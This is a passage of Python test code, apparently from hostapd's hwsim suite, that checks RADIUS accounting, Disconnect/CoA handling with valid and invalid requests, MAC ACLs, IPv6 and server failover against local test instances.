(dev[1].own_addr(), "auth", "77:s:conn-info-1"),
(dev[1].own_addr(), "auth", "77:s:conn-info-1a"),
(dev[1].own_addr(), "acct", "77:s:conn-info-1b")]:
conn.execute(sql, e)
conn.commit()
connect(dev[0], "radius-req-attr")
connect(dev[1], "radius-req-attr")
connect(dev[2], "radius-req-attr")
def test_radius_acct_non_ascii_ssid(dev, apdev):
"""RADIUS Accounting and non-ASCII SSID"""
params = hostapd.wpa2_eap_params()
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "1813"
params['acct_server_shared_secret'] = "radius"
ssid2 = "740665007374"
params['ssid2'] = ssid2
hostapd.add_ap(apdev[0], params)
dev[0].connect(ssid2=ssid2, key_mgmt="WPA-EAP", scan_freq="2412",
eap="PSK", identity="[email protected]",
password_hex="0123456789abcdef0123456789abcdef")
def test_radius_acct_pmksa_caching(dev, apdev):
"""RADIUS Accounting with PMKSA caching"""
as_hapd = hostapd.Hostapd("as")
as_mib_start = as_hapd.get_mib(param="radius_server")
params = hostapd.wpa2_eap_params(ssid="radius-acct")
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "1813"
params['acct_server_shared_secret'] = "radius"
hapd = hostapd.add_ap(apdev[0], params)
connect(dev[0], "radius-acct")
dev[1].connect("radius-acct", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PAX", identity="test-class",
password_hex="0123456789abcdef0123456789abcdef")
for d in [dev[0], dev[1]]:
d.request("REASSOCIATE")
d.wait_connected(timeout=15, error="Reassociation timed out")
count = 0
while True:
mib = hapd.get_mib()
if int(mib['radiusAccClientResponses']) >= 4:
break
time.sleep(0.1)
count += 1
if count > 10:
raise Exception("Did not receive Accounting-Response packets")
if int(mib['radiusAccClientRetransmissions']) > 0:
raise Exception("Unexpected Accounting-Request retransmission")
as_mib_end = as_hapd.get_mib(param="radius_server")
req_s = int(as_mib_start['radiusAccServTotalRequests'])
req_e = int(as_mib_end['radiusAccServTotalRequests'])
if req_e < req_s + 2:
raise Exception("Unexpected RADIUS server acct MIB value")
acc_s = int(as_mib_start['radiusAuthServAccessAccepts'])
acc_e = int(as_mib_end['radiusAuthServAccessAccepts'])
if acc_e < acc_s + 1:
raise Exception("Unexpected RADIUS server auth MIB value")
def test_radius_acct_interim(dev, apdev):
"""RADIUS Accounting interim update"""
as_hapd = hostapd.Hostapd("as")
params = hostapd.wpa2_eap_params(ssid="radius-acct")
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "1813"
params['acct_server_shared_secret'] = "radius"
params['radius_acct_interim_interval'] = "1"
hapd = hostapd.add_ap(apdev[0], params)
connect(dev[0], "radius-acct")
logger.info("Checking for RADIUS counters")
as_mib_start = as_hapd.get_mib(param="radius_server")
time.sleep(4.1)
as_mib_end = as_hapd.get_mib(param="radius_server")
req_s = int(as_mib_start['radiusAccServTotalRequests'])
req_e = int(as_mib_end['radiusAccServTotalRequests'])
if req_e < req_s + 3:
raise Exception("Unexpected RADIUS server acct MIB value (req_e=%d req_s=%d)" % (req_e, req_s))
# Disable Accounting server and wait for interim update retries to fail and
# expire.
as_hapd.disable()
time.sleep(15)
as_hapd.enable()
ok = False
for i in range(10):
time.sleep(1)
as_mib = as_hapd.get_mib(param="radius_server")
if int(as_mib['radiusAccServTotalRequests']) > 0:
ok = True
break
if not ok:
raise Exception("Accounting updates did not seen after server restart")
def test_radius_acct_interim_unreachable(dev, apdev):
"""RADIUS Accounting interim update with unreachable server"""
params = hostapd.wpa2_eap_params(ssid="radius-acct")
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "18139"
params['acct_server_shared_secret'] = "radius"
params['radius_acct_interim_interval'] = "1"
hapd = hostapd.add_ap(apdev[0], params)
start = hapd.get_mib()
connect(dev[0], "radius-acct")
logger.info("Waiting for interium accounting updates")
time.sleep(3.1)
end = hapd.get_mib()
req_s = int(start['radiusAccClientTimeouts'])
req_e = int(end['radiusAccClientTimeouts'])
if req_e < req_s + 2:
raise Exception("Unexpected RADIUS server acct MIB value")
def test_radius_acct_interim_unreachable2(dev, apdev):
"""RADIUS Accounting interim update with unreachable server (retry)"""
params = hostapd.wpa2_eap_params(ssid="radius-acct")
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "18139"
params['acct_server_shared_secret'] = "radius"
# Use long enough interim update interval to allow RADIUS retransmission
# case (3 seconds) to trigger first.
params['radius_acct_interim_interval'] = "4"
hapd = hostapd.add_ap(apdev[0], params)
start = hapd.get_mib()
connect(dev[0], "radius-acct")
logger.info("Waiting for interium accounting updates")
time.sleep(7.5)
end = hapd.get_mib()
req_s = int(start['radiusAccClientTimeouts'])
req_e = int(end['radiusAccClientTimeouts'])
if req_e < req_s + 2:
raise Exception("Unexpected RADIUS server acct MIB value")
def test_radius_acct_ipaddr(dev, apdev):
"""RADIUS Accounting and Framed-IP-Address"""
try:
_test_radius_acct_ipaddr(dev, apdev)
finally:
subprocess.call(['ip', 'link', 'set', 'dev', 'ap-br0', 'down'],
stderr=open('/dev/null', 'w'))
subprocess.call(['brctl', 'delbr', 'ap-br0'],
stderr=open('/dev/null', 'w'))
def _test_radius_acct_ipaddr(dev, apdev):
params = {"ssid": "radius-acct-open",
'acct_server_addr': "127.0.0.1",
'acct_server_port': "1813",
'acct_server_shared_secret': "radius",
'proxy_arp': '1',
'ap_isolate': '1',
'bridge': 'ap-br0'}
hapd = hostapd.add_ap(apdev[0], params, no_enable=True)
try:
hapd.enable()
except:
# For now, do not report failures due to missing kernel support
raise HwsimSkip("Could not start hostapd - assume proxyarp not supported in kernel version")
bssid = apdev[0]['bssid']
subprocess.call(['brctl', 'setfd', 'ap-br0', '0'])
subprocess.call(['ip', 'link', 'set', 'dev', 'ap-br0', 'up'])
dev[0].connect("radius-acct-open", key_mgmt="NONE", scan_freq="2412")
addr0 = dev[0].own_addr()
pkt = build_dhcp_ack(dst_ll="ff:ff:ff:ff:ff:ff", src_ll=bssid,
ip_src="192.168.1.1", ip_dst="255.255.255.255",
yiaddr="192.168.1.123", chaddr=addr0)
if "OK" not in hapd.request("DATA_TEST_FRAME ifname=ap-br0 " + binascii.hexlify(pkt).decode()):
raise Exception("DATA_TEST_FRAME failed")
dev[0].request("DISCONNECT")
dev[0].wait_disconnected()
hapd.disable()
def send_and_check_reply(srv, req, code, error_cause=0):
reply = srv.SendPacket(req)
logger.debug("RADIUS response from hostapd")
for i in list(reply.keys()):
logger.debug("%s: %s" % (i, reply[i]))
if reply.code != code:
raise Exception("Unexpected response code")
if error_cause:
if 'Error-Cause' not in reply:
raise Exception("Missing Error-Cause")
if reply['Error-Cause'][0] != error_cause:
raise Exception("Unexpected Error-Cause: {}".format(reply['Error-Cause']))
def test_radius_acct_psk(dev, apdev):
"""RADIUS Accounting - PSK"""
as_hapd = hostapd.Hostapd("as")
params = hostapd.wpa2_params(ssid="radius-acct", passphrase="12345678")
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "1813"
params['acct_server_shared_secret'] = "radius"
hapd = hostapd.add_ap(apdev[0], params)
dev[0].connect("radius-acct", psk="12345678", scan_freq="2412")
def test_radius_acct_psk_sha256(dev, apdev):
"""RADIUS Accounting - PSK SHA256"""
as_hapd = hostapd.Hostapd("as")
params = hostapd.wpa2_params(ssid="radius-acct", passphrase="12345678")
params["wpa_key_mgmt"] = "WPA-PSK-SHA256"
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "1813"
params['acct_server_shared_secret'] = "radius"
hapd = hostapd.add_ap(apdev[0], params)
dev[0].connect("radius-acct", key_mgmt="WPA-PSK-SHA256",
psk="12345678", scan_freq="2412")
def test_radius_acct_ft_psk(dev, apdev):
"""RADIUS Accounting - FT-PSK"""
as_hapd = hostapd.Hostapd("as")
params = ft_params1(ssid="radius-acct", passphrase="12345678")
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "1813"
params['acct_server_shared_secret'] = "radius"
hapd = hostapd.add_ap(apdev[0], params)
dev[0].connect("radius-acct", key_mgmt="FT-PSK",
psk="12345678", scan_freq="2412")
def test_radius_acct_ieee8021x(dev, apdev):
"""RADIUS Accounting - IEEE 802.1X"""
check_wep_capa(dev[0])
skip_with_fips(dev[0])
as_hapd = hostapd.Hostapd("as")
params = hostapd.radius_params()
params["ssid"] = "radius-acct-1x"
params["ieee8021x"] = "1"
params["wep_key_len_broadcast"] = "13"
params["wep_key_len_unicast"] = "13"
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "1813"
params['acct_server_shared_secret'] = "radius"
hapd = hostapd.add_ap(apdev[0], params)
dev[0].connect("radius-acct-1x", key_mgmt="IEEE8021X", eap="PSK",
identity="[email protected]",
password_hex="0123456789abcdef0123456789abcdef",
scan_freq="2412")
def test_radius_das_disconnect(dev, apdev):
"""RADIUS Dynamic Authorization Extensions - Disconnect"""
try:
import pyrad.client
import pyrad.packet
import pyrad.dictionary
import radius_das
except ImportError:
raise HwsimSkip("No pyrad modules available")
params = hostapd.wpa2_eap_params(ssid="radius-das")
params['radius_das_port'] = "3799"
params['radius_das_client'] = "127.0.0.1 secret"
params['radius_das_require_event_timestamp'] = "1"
params['own_ip_addr'] = "127.0.0.1"
params['nas_identifier'] = "nas.example.com"
hapd = hostapd.add_ap(apdev[0], params)
connect(dev[0], "radius-das")
addr = dev[0].p2p_interface_addr()
sta = hapd.get_sta(addr)
id = sta['dot1xAuthSessionId']
dict = pyrad.dictionary.Dictionary("dictionary.radius")
srv = pyrad.client.Client(server="127.0.0.1", acctport=3799,
secret=b"secret", dict=dict)
srv.retries = 1
srv.timeout = 1
logger.info("Disconnect-Request with incorrect secret")
req = radius_das.DisconnectPacket(dict=dict, secret=b"incorrect",
User_Name="foo",
NAS_Identifier="localhost",
Event_Timestamp=int(time.time()))
logger.debug(req)
try:
reply = srv.SendPacket(req)
raise Exception("Unexpected response to Disconnect-Request")
except pyrad.client.Timeout:
logger.info("Disconnect-Request with incorrect secret properly ignored")
logger.info("Disconnect-Request without Event-Timestamp")
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
User_Name="[email protected]")
logger.debug(req)
try:
reply = srv.SendPacket(req)
raise Exception("Unexpected response to Disconnect-Request")
except pyrad.client.Timeout:
logger.info("Disconnect-Request without Event-Timestamp properly ignored")
logger.info("Disconnect-Request with non-matching Event-Timestamp")
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
User_Name="[email protected]",
Event_Timestamp=123456789)
logger.debug(req)
try:
reply = srv.SendPacket(req)
raise Exception("Unexpected response to Disconnect-Request")
except pyrad.client.Timeout:
logger.info("Disconnect-Request with non-matching Event-Timestamp properly ignored")
logger.info("Disconnect-Request with unsupported attribute")
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
User_Name="foo",
User_Password="foo",
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectNAK, 401)
logger.info("Disconnect-Request with invalid Calling-Station-Id")
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
User_Name="foo",
Calling_Station_Id="foo",
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectNAK, 407)
logger.info("Disconnect-Request with mismatching User-Name")
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
User_Name="foo",
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectNAK, 503)
logger.info("Disconnect-Request with mismatching Calling-Station-Id")
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
Calling_Station_Id="12:34:56:78:90:aa",
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectNAK, 503)
logger.info("Disconnect-Request with mismatching Acct-Session-Id")
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
Acct_Session_Id="12345678-87654321",
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectNAK, 503)
logger.info("Disconnect-Request with mismatching Acct-Session-Id (len)")
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
Acct_Session_Id="12345678",
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectNAK, 503)
logger.info("Disconnect-Request with mismatching Acct-Multi-Session-Id")
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
Acct_Multi_Session_Id="12345678+87654321",
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectNAK, 503)
logger.info("Disconnect-Request with mismatching Acct-Multi-Session-Id (len)")
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
Acct_Multi_Session_Id="12345678",
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectNAK, 503)
logger.info("Disconnect-Request with no session identification attributes")
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectNAK, 503)
ev = dev[0].wait_event(["CTRL-EVENT-DISCONNECTED"], timeout=1)
if ev is not None:
raise Exception("Unexpected disconnection")
logger.info("Disconnect-Request with mismatching NAS-IP-Address")
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
NAS_IP_Address="192.168.3.4",
Acct_Session_Id=id,
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectNAK, 403)
logger.info("Disconnect-Request with mismatching NAS-Identifier")
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
NAS_Identifier="unknown.example.com",
Acct_Session_Id=id,
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectNAK, 403)
ev = dev[0].wait_event(["CTRL-EVENT-DISCONNECTED"], timeout=1)
if ev is not None:
raise Exception("Unexpected disconnection")
logger.info("Disconnect-Request with matching Acct-Session-Id")
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
NAS_IP_Address="127.0.0.1",
NAS_Identifier="nas.example.com",
Acct_Session_Id=id,
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectACK)
dev[0].wait_disconnected(timeout=10)
dev[0].wait_connected(timeout=10, error="Re-connection timed out")
logger.info("Disconnect-Request with matching Acct-Multi-Session-Id")
sta = hapd.get_sta(addr)
multi_sess_id = sta['authMultiSessionId']
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
NAS_IP_Address="127.0.0.1",
NAS_Identifier="nas.example.com",
Acct_Multi_Session_Id=multi_sess_id,
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectACK)
dev[0].wait_disconnected(timeout=10)
dev[0].wait_connected(timeout=10, error="Re-connection timed out")
logger.info("Disconnect-Request with matching User-Name")
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
NAS_Identifier="nas.example.com",
User_Name="[email protected]",
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectACK)
dev[0].wait_disconnected(timeout=10)
dev[0].wait_connected(timeout=10, error="Re-connection timed out")
logger.info("Disconnect-Request with matching Calling-Station-Id")
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
NAS_IP_Address="127.0.0.1",
Calling_Station_Id=addr,
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectACK)
dev[0].wait_disconnected(timeout=10)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED", "CTRL-EVENT-CONNECTED"])
if ev is None:
raise Exception("Timeout while waiting for re-connection")
if "CTRL-EVENT-EAP-STARTED" not in ev:
raise Exception("Unexpected skipping of EAP authentication in reconnection")
dev[0].wait_connected(timeout=10, error="Re-connection timed out")
logger.info("Disconnect-Request with matching Calling-Station-Id and non-matching CUI")
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
Calling_Station_Id=addr,
Chargeable_User_Identity="[email protected]",
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectNAK, error_cause=503)
logger.info("Disconnect-Request with matching CUI")
dev[1].connect("radius-das", key_mgmt="WPA-EAP",
eap="GPSK", identity="gpsk-cui",
password="abcdefghijklmnop0123456789abcdef",
scan_freq="2412")
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
Chargeable_User_Identity="gpsk-chargeable-user-identity",
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectACK)
dev[1].wait_disconnected(timeout=10)
dev[1].wait_connected(timeout=10, error="Re-connection timed out")
ev = dev[0].wait_event(["CTRL-EVENT-DISCONNECTED"], timeout=1)
if ev is not None:
raise Exception("Unexpected disconnection")
connect(dev[2], "radius-das")
logger.info("Disconnect-Request with matching User-Name - multiple sessions matching")
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
NAS_Identifier="nas.example.com",
User_Name="[email protected]",
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectNAK, error_cause=508)
logger.info("Disconnect-Request with User-Name matching multiple sessions, Calling-Station-Id only one")
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
NAS_Identifier="nas.example.com",
Calling_Station_Id=addr,
User_Name="[email protected]",
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectACK)
dev[0].wait_disconnected(timeout=10)
dev[0].wait_connected(timeout=10, error="Re-connection timed out")
ev = dev[2].wait_event(["CTRL-EVENT-DISCONNECTED"], timeout=1)
if ev is not None:
raise Exception("Unexpected disconnection")
logger.info("Disconnect-Request with matching Acct-Multi-Session-Id after disassociation")
sta = hapd.get_sta(addr)
multi_sess_id = sta['authMultiSessionId']
dev[0].request("DISCONNECT")
dev[0].wait_disconnected(timeout=10)
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
NAS_IP_Address="127.0.0.1",
NAS_Identifier="nas.example.com",
Acct_Multi_Session_Id=multi_sess_id,
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectACK)
dev[0].request("RECONNECT")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
dev[0].wait_connected(timeout=15)
logger.info("Disconnect-Request with matching User-Name after disassociation")
dev[0].request("DISCONNECT")
dev[0].wait_disconnected(timeout=10)
dev[2].request("DISCONNECT")
dev[2].wait_disconnected(timeout=10)
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
NAS_IP_Address="127.0.0.1",
NAS_Identifier="nas.example.com",
User_Name="[email protected]",
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectACK)
logger.info("Disconnect-Request with matching CUI after disassociation")
dev[1].request("DISCONNECT")
dev[1].wait_disconnected(timeout=10)
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
NAS_IP_Address="127.0.0.1",
NAS_Identifier="nas.example.com",
Chargeable_User_Identity="gpsk-chargeable-user-identity",
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectACK)
logger.info("Disconnect-Request with matching Calling-Station-Id after disassociation")
dev[0].request("RECONNECT")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
dev[0].wait_connected(timeout=15)
dev[0].request("DISCONNECT")
dev[0].wait_disconnected(timeout=10)
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
NAS_IP_Address="127.0.0.1",
NAS_Identifier="nas.example.com",
Calling_Station_Id=addr,
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectACK)
logger.info("Disconnect-Request with mismatching Calling-Station-Id after disassociation")
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
NAS_IP_Address="127.0.0.1",
NAS_Identifier="nas.example.com",
Calling_Station_Id=addr,
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectNAK, error_cause=503)
def add_message_auth_req(req):
req.authenticator = req.CreateAuthenticator()
hmac_obj = hmac.new(req.secret, digestmod=hashlib.md5)
hmac_obj.update(struct.pack("B", req.code))
hmac_obj.update(struct.pack("B", req.id))
# request attributes
req.AddAttribute("Message-Authenticator", 16*b"\x00")
attrs = b''
for code, datalst in sorted(req.items()):
for data in datalst:
attrs += req._PktEncodeAttribute(code, data)
# Length
flen = 4 + 16 + len(attrs)
hmac_obj.update(struct.pack(">H", flen))
hmac_obj.update(16*b"\x00") # all zeros Authenticator in calculation
hmac_obj.update(attrs)
del req[80]
req.AddAttribute("Message-Authenticator", hmac_obj.digest())
def test_radius_das_disconnect_time_window(dev, apdev):
"""RADIUS Dynamic Authorization Extensions - Disconnect - time window"""
try:
import pyrad.client
import pyrad.packet
import pyrad.dictionary
import radius_das
except ImportError:
raise HwsimSkip("No pyrad modules available")
params = hostapd.wpa2_eap_params(ssid="radius-das")
params['radius_das_port'] = "3799"
params['radius_das_client'] = "127.0.0.1 secret"
params['radius_das_require_event_timestamp'] = "1"
params['radius_das_require_message_authenticator'] = "1"
params['radius_das_time_window'] = "10"
params['own_ip_addr'] = "127.0.0.1"
params['nas_identifier'] = "nas.example.com"
hapd = hostapd.add_ap(apdev[0], params)
connect(dev[0], "radius-das")
addr = dev[0].own_addr()
sta = hapd.get_sta(addr)
id = sta['dot1xAuthSessionId']
dict = pyrad.dictionary.Dictionary("dictionary.radius")
srv = pyrad.client.Client(server="127.0.0.1", acctport=3799,
secret=b"secret", dict=dict)
srv.retries = 1
srv.timeout = 1
logger.info("Disconnect-Request with unsupported attribute")
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
NAS_IP_Address="127.0.0.1",
NAS_Identifier="nas.example.com",
Calling_Station_Id=addr,
Event_Timestamp=int(time.time()) - 50)
add_message_auth_req(req)
logger.debug(req)
try:
reply = srv.SendPacket(req)
raise Exception("Unexpected response to Disconnect-Request")
except pyrad.client.Timeout:
logger.info("Disconnect-Request with non-matching Event-Timestamp properly ignored")
logger.info("Disconnect-Request with unsupported attribute")
req = radius_das.DisconnectPacket(dict=dict, secret=b"secret",
NAS_IP_Address="127.0.0.1",
NAS_Identifier="nas.example.com",
Calling_Station_Id=addr,
Event_Timestamp=int(time.time()))
add_message_auth_req(req)
send_and_check_reply(srv, req, pyrad.packet.DisconnectACK)
def test_radius_das_coa(dev, apdev):
"""RADIUS Dynamic Authorization Extensions - CoA"""
try:
import pyrad.client
import pyrad.packet
import pyrad.dictionary
import radius_das
except ImportError:
raise HwsimSkip("No pyrad modules available")
params = hostapd.wpa2_eap_params(ssid="radius-das")
params['radius_das_port'] = "3799"
params['radius_das_client'] = "127.0.0.1 secret"
params['radius_das_require_event_timestamp'] = "1"
hapd = hostapd.add_ap(apdev[0], params)
connect(dev[0], "radius-das")
addr = dev[0].p2p_interface_addr()
sta = hapd.get_sta(addr)
id = sta['dot1xAuthSessionId']
dict = pyrad.dictionary.Dictionary("dictionary.radius")
srv = pyrad.client.Client(server="127.0.0.1", acctport=3799,
secret=b"secret", dict=dict)
srv.retries = 1
srv.timeout = 1
# hostapd does not currently support CoA-Request, so NAK is expected
logger.info("CoA-Request with matching Acct-Session-Id")
req = radius_das.CoAPacket(dict=dict, secret=b"secret",
Acct_Session_Id=id,
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.CoANAK, error_cause=405)
def test_radius_ipv6(dev, apdev):
"""RADIUS connection over IPv6"""
params = {}
params['ssid'] = 'as'
params['beacon_int'] = '2000'
params['radius_server_clients'] = 'auth_serv/radius_clients_ipv6.conf'
params['radius_server_ipv6'] = '1'
params['radius_server_auth_port'] = '18129'
params['radius_server_acct_port'] = '18139'
params['eap_server'] = '1'
params['eap_user_file'] = 'auth_serv/eap_user.conf'
params['ca_cert'] = 'auth_serv/ca.pem'
params['server_cert'] = 'auth_serv/server.pem'
params['private_key'] = 'auth_serv/server.key'
hostapd.add_ap(apdev[1], params)
params = hostapd.wpa2_eap_params(ssid="radius-ipv6")
params['auth_server_addr'] = "::0"
params['auth_server_port'] = "18129"
params['acct_server_addr'] = "::0"
params['acct_server_port'] = "18139"
params['acct_server_shared_secret'] = "radius"
params['own_ip_addr'] = "::0"
hostapd.add_ap(apdev[0], params)
connect(dev[0], "radius-ipv6")
def test_radius_macacl(dev, apdev):
"""RADIUS MAC ACL"""
params = hostapd.radius_params()
params["ssid"] = "radius"
params["macaddr_acl"] = "2"
hostapd.add_ap(apdev[0], params)
dev[0].connect("radius", key_mgmt="NONE", scan_freq="2412")
# Invalid VLAN ID from RADIUS server
dev[2].connect("radius", key_mgmt="NONE", scan_freq="2412")
dev[2].request("REMOVE_NETWORK all")
dev[2].wait_disconnected()
dev[2].connect("radius", key_mgmt="NONE", scan_freq="2412")
def test_radius_macacl_acct(dev, apdev):
"""RADIUS MAC ACL and accounting enabled"""
params = hostapd.radius_params()
params["ssid"] = "radius"
params["macaddr_acl"] = "2"
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "1813"
params['acct_server_shared_secret'] = "radius"
hostapd.add_ap(apdev[0], params)
dev[0].connect("radius", key_mgmt="NONE", scan_freq="2412")
dev[1].connect("radius", key_mgmt="NONE", scan_freq="2412")
dev[1].request("DISCONNECT")
dev[1].wait_disconnected()
dev[1].request("RECONNECT")
def test_radius_macacl_oom(dev, apdev):
"""RADIUS MAC ACL and OOM"""
params = hostapd.radius_params()
params["ssid"] = "radius"
params["macaddr_acl"] = "2"
hapd = hostapd.add_ap(apdev[0], params)
bssid = hapd.own_addr()
dev[0].scan_for_bss(bssid, freq="2412")
with alloc_fail(hapd, 1, "hostapd_allowed_address"):
dev[0].connect("radius", key_mgmt="NONE", scan_freq="2412")
dev[1].scan_for_bss(bssid, freq="2412")
with alloc_fail(hapd, 2, "hostapd_allowed_address"):
dev[1].connect("radius", key_mgmt="NONE", scan_freq="2412")
dev[2].scan_for_bss(bssid, freq="2412")
with alloc_fail(hapd, 2, "=hostapd_allowed_address"):
dev[2].connect("radius", key_mgmt="NONE", scan_freq="2412")
def test_radius_macacl_unreachable(dev, apdev):
"""RADIUS MAC ACL and server unreachable"""
params = hostapd.radius_params()
params['auth_server_port'] = "18139"
params["ssid"] = "radius"
params["macaddr_acl"] = "2"
hapd = hostapd.add_ap(apdev[0], params)
bssid = hapd.own_addr()
dev[0].scan_for_bss(bssid, freq="2412")
dev[0].connect("radius", key_mgmt="NONE", scan_freq="2412",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-CONNECTED"], timeout=3)
if ev is not None:
raise Exception("Unexpected connection")
logger.info("Fix authentication server port")
hapd.set("auth_server_port", "1812")
hapd.disable()
hapd.enable()
dev[0].wait_connected(timeout=20)
dev[0].request("DISCONNECT")
dev[0].wait_disconnected()
def test_radius_failover(dev, apdev):
"""RADIUS Authentication and Accounting server failover"""
subprocess.call(['ip', 'ro', 'replace', '192.168.213.17', 'dev', 'lo'])
as_hapd = hostapd.Hostapd("as")
as_mib_start = as_hapd.get_mib(param="radius_server")
params = hostapd.wpa2_eap_params(ssid="radius-failover")
params["auth_server_addr"] = "192.168.213.17"
params["auth_server_port"] = "1812"
params["auth_server_shared_secret"] = "testing"
params['acct_server_addr'] = "192.168.213.17"
params['acct_server_port'] = "1813"
params['acct_server_shared_secret'] = "testing"
params['radius_retry_primary_interval'] = "20"
hapd = hostapd.add_ap(apdev[0], params, no_enable=True)
hapd.set("auth_server_addr", "127.0.0.1")
hapd.set("auth_server_port", "1812")
hapd.set("auth_server_shared_secret", "radius")
hapd.set('acct_server_addr', "127.0.0.1")
hapd.set('acct_server_port', "1813")
hapd.set('acct_server_shared_secret', "radius")
hapd.enable()
ev = hapd.wait_event(["AP-ENABLED", "AP-DISABLED"], timeout=30)
if ev is None:
raise Exception("AP startup timed out")
if "AP-ENABLED" not in ev:
raise Exception("AP startup failed")
start = os.times()[4]
try:
subprocess.call(['ip', 'ro', 'replace', 'prohibit', '192.168.213.17'])
dev[0].request("SET EAPOL::authPeriod 5")
connect(dev[0], "radius-failover", wait_connect=False)
dev[0].wait_connected(timeout=20)
finally:
dev[0].request("SET EAPOL::authPeriod 30")
subprocess.call(['ip', 'ro', 'del', '192.168.213.17'])
as_mib_end = as_hapd.get_mib(param="radius_server")
req_s = int(as_mib_start['radiusAccServTotalRequests'])
req_e = int(as_mib_end['radiusAccServTotalRequests'])
if req_e <= req_s:
raise Exception("Unexpected RADIUS server acct MIB value")
end = os.times()[4]
try:
subprocess.call(['ip', 'ro', 'replace', 'prohibit', '192.168.213.17'])
dev[1].request("SET EAPOL::authPeriod 5")
if end - start < 21:
time.sleep(21 - (end - start))
connect(dev[1], "radius-failover", wait_connect=False)
dev[1].wait_connected(timeout=20)
finally:
dev[1].request("SET EAPOL::authPeriod 30")
subprocess.call(['ip', 'ro', 'del', '192.168.213.17'])
def run_pyrad_server(srv, t_events):
srv.RunWithStop(t_events)
def test_radius_protocol(dev, apdev):
"""RADIUS Authentication protocol tests with a fake server"""
try:
import pyrad.server
import pyrad.packet
import pyrad.dictionary
except ImportError:
raise HwsimSkip("No pyrad modules available")
class TestServer(pyrad.server.Server):
def _HandleAuthPacket(self, pkt):
pyrad.server.Server._HandleAuthPacket(self, pkt)
logger.info("Received authentication request")
reply = self.CreateReplyPacket(pkt)
reply.code = pyrad.packet.AccessAccept
if self.t_events['msg_auth'].is_set():
logger.info("Add Message-Authenticator")
if self.t_events['wrong_secret'].is_set():
logger.info("Use incorrect RADIUS shared secret")
pw = b"incorrect"
else:
pw = reply.secret
hmac_obj = hmac.new(pw, digestmod=hashlib.md5)
hmac_obj.update(struct.pack("B", reply.code))
hmac_obj.update(struct.pack("B", reply.id))
# reply attributes
